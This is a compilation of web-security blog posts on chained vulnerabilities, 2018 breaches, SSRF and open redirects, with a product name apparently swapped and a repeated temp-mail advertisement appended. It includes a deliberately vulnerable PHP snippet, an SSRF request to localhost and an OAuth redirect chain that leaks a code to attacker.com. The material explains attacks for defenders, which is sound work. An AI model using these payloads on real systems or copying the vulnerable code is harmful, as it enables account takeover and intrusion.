Do not dismiss the small vulnerabilities! – 10 minute mail

Never dismiss a small vulnerability because its impact on its own is negligible. Seemingly innocent vulnerabilities can be combined into something much more dangerous or, at the very least, be used to aid in an attack.

Sometimes a small vulnerability is overlooked as the impact is not seen as dangerous. What is often missed in this type of scenario is what happens when vulnerabilities are combined. This is often called chain vulnerabilities.

Combining vulnerabilities

It is way too common to disregard vulnerabilities because they have no big security impact by themselves.

This is not a technical blog post with awesome well thought-out examples of combined vulnerabilities. This is food for thought, to introduce the mindset and make you think a few steps ahead. This is how the examples should be read.

How vulnerabilities can be combined

Example 1

Imagine there is a developer page publicly accessible from the internet. The only thing this page does it print the whole request onto the page. At the first glance this looks very innocent, how much does seeing their own request really help the attacker?

Now, imagine there is also an XSS on the same domain. All of a sudden the printed request becomes very bad, as the hacker is able to steal all cookies with the XSS. An XSS can read the content of the webpage but not the sent headers when HTTPOnly is used. Such a debug page will therefore result in an HTTPOnly bypass.

Example 2

Sometimes developers deprioritize upgrading software that is only accessible locally. Vulnerable software that only allows requests from localhost/the same server does not sound that scary.

There is another vulnerability type called SSRF, Server Side Request Forgery. In short, it means that an attacker is able to force the web server to make custom requests to the internal network.

Now combine these two and an attacker is able to exploit the vulnerable software that was only running locally. Neither of those things sound that dangerous, but combined, they can have a considerable impact!

Example 3

Login/logout CSRF is another vulnerability we have written about before. It enables the attacker to forcefully log the victim in to the attacker’s own account.

Once again, at first glance this looks innocent enough. What good does it do the attacker that they can give away their own account? However, combine it with an XSS that previously only affected your own account and you now have an XSS affecting anyone.

Example 4

A great write-up on the subject is this one written by Orange Tsai, combining four different vulnerabilities resulting in the ability to execute code on Github’s servers.

Automation

Many of these combinations are hard to automate. Some can of course be combined automatically, but others still require human creativity to fully understand the potential impact.

Because of this, minor issues reported by tools such as Disposable mail should not be ignored. Critical findings need to be prioritised, but it is a good idea to try and think about how an attacker might exploit minor issues. Maybe even the most harmless ones can escalate into something critical?

To check your site for both minor and critical security issues, sign up for a free Disposable mail trial and run a scan. You will receive a detailed report with all the identified vulnerabilities and tips on how to fix them.

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

9 biggest web security news of 2018 – 10 minute mail

The year started off with a bang as the research of Meltdown and Spectre rendered almost all computing devices to be vulnerable. As the year moved on Facebook, Magecart and 2FA alternatives also were also part of security discussions. Here are our top 9 picks for biggest web security news of 2018:

Image for top security news for 2018

1. Meltdown and Spectre

Meltdown and Spectre are collectively 3 critical vulnerabilities had anyone with a computer made since 1995 on their feet. Meltdown (CVE-2017-5754) is a hardware vulnerability found to attack general memory data security and the name was given due to the ability of the attack to “melt” security boundaries. Spectre (CVE-2017-5753 and CVE-2017-5715) is reported to affect every single computer device, as it’s been verified that they affect Intel, AMD, and ARM processors. Their exploitation allows hackers to access passwords stored in a password manager or browser, personal photos, emails, private messages and even business-critical documents.

2. Facebook – “View As” feature

Facebook has been in the public eyes on several big occasions this year including the Cambridge Analytica scandal and Mark Zuckerberg’s testimony in front of the US Congress about data privacy. The year wouldn’t be complete without a hacker attack. Late September, 50 million people were automatically logged out of their Facebook accounts due to a hacker attack via the “View As” feature. The hackers began by exploiting the video uploading feature and eventually chained this together with a weakness in the “View As” feature. During this process a user token was generated when it wasn’t intended to happen for the one subject to “view as” and this appeared in the HTML code. From there the hackers gained access to the user account and automated their attack which eventually resulted in an activity spike to catch Facebook’s attention and take action in time. In total, there were 3 bugs that the malicious actors were able to chain together to gain access to user tokens. When Facebook was aware of this, it forced log out to reset tokens for 50 million users and an additional 40 million who were potentially affected. Whilst Facebook’s logging and monitoring practices were able to act fast and alert users well, the company seems to not want to take more security risks as there are plans to add a cybersecurity company to their group.

3. Marriott – 500 million users had data stolen.. Hackers had access since 2014

Going down as one of the largest data breaches to happen so far, 500 million Starwood guests had their personal details such as names, addresses, passport information and emails compromised to malicious hackers. Reports state hackers were in the system back in 2014 which happened before Marriott acquired the Starwood Hotel brand in 2016, and this has angered many security experts and people in general knowing that SPG aware of the issue and it was failed to be addressed during the acquisition. The personal information taken was encrypted however given 4 years time, one could be certain that the hackers were able to decrypt the details. It’s not certain whether Marriott was aware of this or not but we can expect cybersecurity to be taken more seriously in future business acquisitions.

  4. Another year of leaky S3 buckets, which led to AWS finally changing the privacy settings for bucket configurations

As in 2017, this year saw several high-profile companies fall victim to customer data leak to cloud storage, especially S3 bucket, misconfigurations including FedEx and GoDaddy. These are often the fault of the company due to AWS S3 bucket misconfigurations but we even saw a case where an AWS employee made the mistake of S3 bucket misconfiguration for GoDaddy. The consequence: public exposure of highly sensitive information including GoDaddy’s hosting infrastructure, operating system, workload and more which gave out a lot of competitive intelligence. This finally prompted AWS to make changes to the bucket settings and make it easier for users to block public access to buckets.

5. Implementation of GDPR and Google and Facebook slapped with fines

2018 also was the year for GDPR to come into play and this has all sorts of professionals scrambling to make sure their practices are compliant, lawyers were banking in on new business, some opportunists upgraded their careers to becoming a DPO and end users were bombarded with emails regarding GDPR, all before May 25th. There was no grace period to GDPR enforcement as Google and Facebook were given fines immediately. Not only did GDPR get ordinary people to start thinking a bit more on the privacy of their personal details, but it has challenged companies to work more proactively with security.

6. Magecart and third-party javascript

Magecart, an online criminal hacker group, has been using cross-site scripting (XSS) tactics to injection malicious code into different online credit card forms. By doing so they’ve been able to steal sensitive information including, yes of course, credit card details and personal names. This method is used widely and companies compromised by this attack are many and include British Airways and Inbenta, a 3rd party javascript used by Ticketmaster. This serves as a good reminder to always check web applications for XSS and especially third-party software as Magecart does not show signs of stopping.

7. SMS 2FA not secure

Reddit was hacked in June and their employee accounts were compromised despite having 2FA via SMS enabled. As their report explains, the attacker was able to intercept SMS messages containing the access code and use this to log into the employee accounts. This prompted a great discussion on what kind of 2FA is needed. Reddit themselves suggest using a token-based 2FA as well as ensuring passwords are complicated. You can find these tips and more in our tips for secure remote work.

8. Drupalgeddon

There was a remote code execution found in Drupal, and this critical vulnerability was aptly named Drupalgeddon v2.0. This affects versions between 6 and 8, and if exploited the bad actor would have access to all non-public data and also have the ability to modify or delete items. According to official notes, updating Drupal along will not remove backdoors or fix compromised sites. Therefore anyone affected would have to update right away but also run their own security checks to remediate the issue.

9. Stop playing security whack-a-mole

Parisa Tabriz, Director of Engineering at Google, opened up this year’s Black Hat USA calling on everyone to implement long-term defensive security. Rather than playing what she called security whack-a-mole and tackling security issues as they come up, there needs to be more strategic and proactive action to ensure security in a company. She cited the Google Project Zero as one way they’ve used offensive security examples to improve defensive security tactics, leading to more transparency and collaboration to make end users safer. Companies should build ongoing security processes and invest in training, build up security champions and develop a security culture in the organization. Some argue it needs to be thought of earlier in the development cycle, given more support for the adoption of DevSecOps.

What can we expect next year? We asked our security researcher and technical content writer, Linus Särud:

In 2019, we can expect more cloud-related issues on the rise as well as misconfigurations with third-party providers. They may not necessarily be from S3 bucket leaks due to the changes, but could be of similar nature.

Serverless, microservices and API are the “new thing” and we can expect acceleration in migration over to these services. As a consequence we anticipate more SSRF attacks. When companies go serverless and the traditional RCE is no longer possible, SSRF takes its place. It can be used to request internal servers and steal tokens or credentials used for cloud configurations. Early 2018, Google was vulnerable against this. Here is another write-up on how SSRF can be a problem when running on Amazon, causing the cloud to rain credentials.

Lastly, we expect more subdomain takeovers to occur and while this has been hyped for long there will be a lot to be discovered in this area. On the positive side, we anticipate more awareness of cloud security risks and the continued rise of devsecops where security is considered earlier in the development cycle and companies apply proactive defence instead of reactive measures, enabled by more automation and testing. There will more open discussions about personal data management because of the GDPR, NIS directive and other security regulations. People will start to think differently about the security of personal information, in a more protective way, which is a good thing!

Here’s to an even more secure 2019! Is your team equipped with all the tools to make 2019 a secure year for your teams? You can automate some of your security checks using Disposable mail. Ready to give us a try? Sign up for a free trial.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

What is server side request forgery (SSRF)? – 10 minute mail

Server Side Request Forgery (SSRF) is a type of attack that can be carried out to compromise a server. The exploitation of a SSRF vulnerability enables attackers to send requests made by the web application, often targeting internal systems behind a firewall. Sometimes a server needs to make URL-request based on user input. A clear example would be an import-function, where you can import images from a URL, perhaps when setting a profile picture. When you as a user enter a URL, the server will make a request to that URL and fetch the image. 

Server-side request forgery

Interesting things happen when this function can be used to make request to internal services, for example, local IP-addresses (RFC1918) which are not publicly accessible from the internet.   If the URL given by the user is not an image, the error page will often show the response of the requested URL. That makes it easier to exploit, but is not a requirement. You can no longer request information from internal systems, but can still make internal API-calls. Imagine the following PHP code:

//getimage.php

$content = file_get_contents($_GET['url']);

file_put_contents(‘image.jpg’, $content);

The above code will fetch data from a URL using PHP’s file_get_contents() function and then save it to the disk. A legitime request would then look like:

GET  /getimage.php?url=https://website.com/images/cat.jpg

And the web application would make a request to https://website.com/images/cat.jpg. This code could be exploited with SSRF. Such an attack could look something like:

GET  /getimage.php?url=http://127.0.0.1/api/v1/getuser/id/1

In this case the vulnerable web application would make a GET request to the internal REST API service, trying to access the /api/v1/getuser/id/1 endpoint. This REST API service is only accessible on the local network, but due to a SSRF vulnerability it was possible for the attacker to make such an internal request and read that response.   Sometimes you can make a request to an external server, and the request itself may contain sensitive headers. One of many examples would be HTTP basic passwords, if a proxy has been used. SSRF can therefore be carried out to both internal and external services. The vulnerability often occurs when you are supposed to be able to make requests to a certain domain, but are able to bypass the parser/filter. A security researcher known as Orange Tsai spoke about this previously at Black Hat 2017. Not to be forgotten, sometimes it is possible to use other schemes and protocols in a SSRF attack other than HTTP. Examples of these are file://, phar://, gopher://, data://and dict://

Traditional setup

It is common to have a proper firewall/routing rules for external applications, but normally nothing inside the network. That means that an attacker is able to make a device already on the network send the requests, there are no security restrictions to care about for internal systems.

Cloud services

Due to microservices and serverless platforms, SSRF will probably be a bigger thing in the future. Making internal requests now means that you can interact with other parts of the service, pretending to be the actual service. Get familiar with cloud security basics including SSRF as we are already seeing examples of how a SSRF vulnerability more or less leads to RCE in companies running on modern technologies. Examples: $36k Google App Engine RCE SSRF reports on hackerone If you are using a service such as AWS or Google Cloud, it is often possible to request sensitive tokens/credentials through some API. Metadata in AWS, Google Cloud, and others: https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b

There is no universal protection against SSRF attacks, however there are a few things to have in mind:

  • A blacklist is not a good protection because with so many different protocols, schemes, encodings and super complex URI syntax, bypasses will most certainly occur. Because of this, a whitelist is a better approach.
  • When developing REST API’s, it is better to accept other HTTP verbs than POST and GET which will make it harder for a SSRF vulnerability to make correct requests to the API service. If a SSRF vulnerability is only able to make internal GET requests it won’t be able to speak with the API. It is also important to validate both the request and response to internal services.
  • Services such as Kibana, Redis, Elasticsearch, MongoDB and Memcached do not per default require authentication, and adding that to those services may make it harder to exploit a SSRF vulnerability.  

The most common way for Disposable mail to detect this kind of vulnerability is by using Out-of-Band-Exploitation. For each test we generate a unique string, which we then try to send a request to as part of the domain name. For a specific test we might generate foobar. We then make a request to the server including foobar.poem.detectify.com. If the nameserver for that subdomain then get a lookup-request for foobar we know that the server has tried to send a request to it, even if we were unable to read the response. For specific tests we may have other solutions in place. 

Start your Disposable mail free trial today.

Additional reading:

SSRF definition on OWASP.org

MITRE: CWE-918: Server-Side Request Forgery (SSRF)


Written by: Kristian Bremberg Linus Särud Disposable mail is automated web application scanner checking for 1000+ known vulnerabilities including OWASP Top 10 and SSRF. Start your Disposable mail free trial today to see whether your applications are vulnerability to SSRF and more.

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Disposable mail security updates for 23 January – 10 minute mail

For continuous coverage, we push out major Disposable mail security updates every two weeks, keeping our tool up-to-date with new findings, features and improvements sourced from our security researchers and Crowdsource ethical hacker community. Due to confidentially agreements, we cannot publicize all security update releases here but they are immediately added to our scanner and available to all users. This post highlights a few things that we have improved in the last two weeks.

CVE-2019-2413: Oracle Reports Reflected XSS
One of the endpoints in Oracle Reports reflects the requested URL, which leads to a XSS-vulnerability.

CVE-2018-5006: Adobe AEM SSRF via ReportingServicesProxyServlet
CVE-2018-12809 is a SSRF vulnerability in Adobe AEM. It is possible to see the content of the request, and thus eg. query meta-data if it runs within AWS. Read more about  SSRF here.

CVE-2017-12637: SAP NetWeaver Directory Traversal
It is possible to read the content of locally hosted files. More information about the vulnerability type can be found here.

Adobe AEM CQ Content-Finder XSS
It is possible to get a response that is supposed to be JSON to instead be sent as HTML, which then leads to a XSS-vulnerability.

Oracle Reports Diagnostic Endpoint Exposure
Oracle Reports has a endpoint used for diagnostic information. This gives the attacker information about a system that is supposed to be kept internal.

WGET HSTS List Exposure
When running the WGET-command a file is creating containing information about the HSTS-information from the downloaded links. This file is sometimes accidentally made publicly available.

Exposure of /.lesshst
.lesshst is a file containing history from the command less. Similar to the issue above, this file is sometimes made publicly available.

WordPress newsletter Open Redirect
A open redirect-vulnerability in a popular WordPress Plugin that is used for newsletter subscription management.

WordPress wordfence Configuration Disclosure
A configuration file for Wordfence is sometimes made publicly available, which would disclose that Wordfence is used. This is not very sensitive, but gives an attacker more information about a system.

Questions or comments on our latest security updates? Let us know in the section below.

Begin a scan for the latest vulnerabilities today. Start a free trial with Disposable mail here!

Already have an account? Login to check your assets.

Disposable mail is a continuous web scanner monitor service that can be set up for automated scanning for 1000+ known vulnerabilities including the OWASP Top 10. Check for the latest vulnerabilities!

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

The real impact of an Open Redirect vulnerability – 10 minute mail

The simplest explanation is that the page takes a value and then creates a redirect to it. If /red.php?url=https://example.com created a redirect to https://example.com that would be a typical Open Redirect-vulnerability.

This is called Unvalidated Redirects and Forwards by OWASP and could of course occur by less obvious reasons as well. Maybe you are only supposed to be able to redirect to a specific domain but is there a bypass of the filter? Maybe the value is not coming from a URL-parameter at all, but something totally different.

We have described this vulnerability type before, while this article will go into how an Open Redirect vulnerability can be exploited.

Header based

Header-based being a location-header sent from the server. The benefit with this, for an attacker’s perspective, is that the redirect always works even if Javascript is not interpreted. A server side function that gets a URL as input will follow the redirect and end up somewhere else.

Javascript based

When the redirect instead happens in Javascript it only works in scenarios where Javascript is actually executed. It might not work for server-side functions, but it will work in the victim’s web browser.

If the redirect happens in Javascript it might also be possible to cause a redirect to javascript:something(), which would be an XSS in itself.

When explaining the impact of an open redirect it is common to default to phishing or similar attacks. The question whether it actually is a problem or not to use open redirect for phishing is a debatable question. If receive a link which then redirects you to a sketchy site, how much more trustworthy is that compared to receiving a link to the sketchy site directly?

While some companies do consider this a legitimate risk, others do not.

Some members of the security community argue that the redirectors aid phishing, because users may be inclined to trust the mouse hover tooltip on a link and then fail to examine the address bar once the navigation takes place.

Our take on this is that tooltips are not a reliable security indicator, and can be tampered with in many ways; so, we invest in technologies to detect and alert users about phishing and abuse, but we generally hold that a small number of properly monitored redirectors offers fairly clear benefits and poses very little practical risk.https://sites.google.com/site/bughunteruniversity/nonvuln/open-redirect

However, phishing is not really all an open redirect can be good for. Open Redirect is often quickly dismissed because phishing is the first thing you come to think about, without considering what it could actually be combined with.

Instead, an open redirect often allows other vulnerabilities to be exploited, or chained to increase the impact. A list of a few of the things an open redirect vulnerability can be used for follows below. It is far from a comprehensive list, but could act as an example of what is possible:

Oauth

When you want to allow users to sign-up with external services, such as putting up a “Login with Facebook” or “Sign up with Google”-button you may choose to implement an Oauth-flow.

The basic principle is a link going to facebook.com/oauth.php?clientid=123&state=abc&redirect_uri=https://yourdomain.com/oauth. When the user clicks this link they are going to Facebook where they login and accept the permissions your app requires, and then redirected back to https://yourdomain.com/oauth?code=xyz.

Now your application can take the value of code and by using that getting partial access to the user’s Facebook account, all according to what permissions it has been given you on the login screen. The attacker can also re-use the value of the code parameter to login to the application with the victim’s Facebook account.

If an attacker would change the redirect_uri to https://attacker.com/oauth the request would be denied directly, as it is an external domain. However, if the attacker would find an open redirect on the accepted domain, it might be possible to combine those.

facebook.com/oauth.php?clientid=123&state=abc&redirect_url=https://yourdomain.com/red.php?url%3dhttps://attacker.com/

which causes a redirect to

https://yourdomain.com/red.php?url=https://attacker.com/?code=xyz

which in turn causes a redirect to

https://attacker.com/?code=xyz

and now the attacker are able to access the Facebook account on the application’s behalf.

(If it is not possible to keep the code-parameter in the URL when redirecting, it might be leaked in the referrer header in the last request)

Facebook prevents this attack by requiring the redirect_uri to match a pre-configured URL. However, many other services do not, where this is still a potential issue.

Sometimes this gets a bit complicated, such as Github’s oauth flow accepts any subdomain, so if x.com/auth is accepted, so is y.x.com/auth, even though this behaviour is not mentioned anywhere in the documentation. This means that an open redirect on any of your subdomains would lead to an account takeover.

SSRF

We have written about SSRF here before: https://blog.detectify.com/2019/01/10/what-is-server-side-request-forgery-ssrf/

Open redirect is something that is often used to bypass filters used here. Imagine that you have a service that are allowed to access content from a specific domain, but that domain could redirect anywhere. Then an attacker can enter the allowed server, and from there go anywhere.

XSS-Auditor bypass

Google Chrome has a built-in XSS-auditor which sometimes prevents a XSS-attack from working. However, it does not prevent an inclusion of scripts hosted at the same domain, so together with an open redirect you can bypass the XSS-auditor like this:

There are some limitations though, such as that the URL cannot contain an equal sign.

Referrer check bypass

One way of protecting against CSRF is to check the referrer header to confirm that the request originated from the website itself.

However, with an open redirect it might be possible to trick this by running the CSRF-attack against the open redirect that in turn redirects to the correct page. It will look like the CSRF originated from the open redirect-page, which are hosted on the same domain and is allowed to do such requests.

 

So in conclusion, when you report or create a finding for an open redirect, it is generally not for the impact of the open redirect in itself, but rather for what it can be combined with. Thus, fixing an open redirect prevents the vulnerability from being exploited at an earlier stage.

How Disposable mail can help

Disposable mail has an ability to test web applications for open redirect vulnerabilities and 1000+ known web vulnerabilities including the OWASP Top 10 and more. Check your web applications using Disposable mail by starting your 14-day free trial today.

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.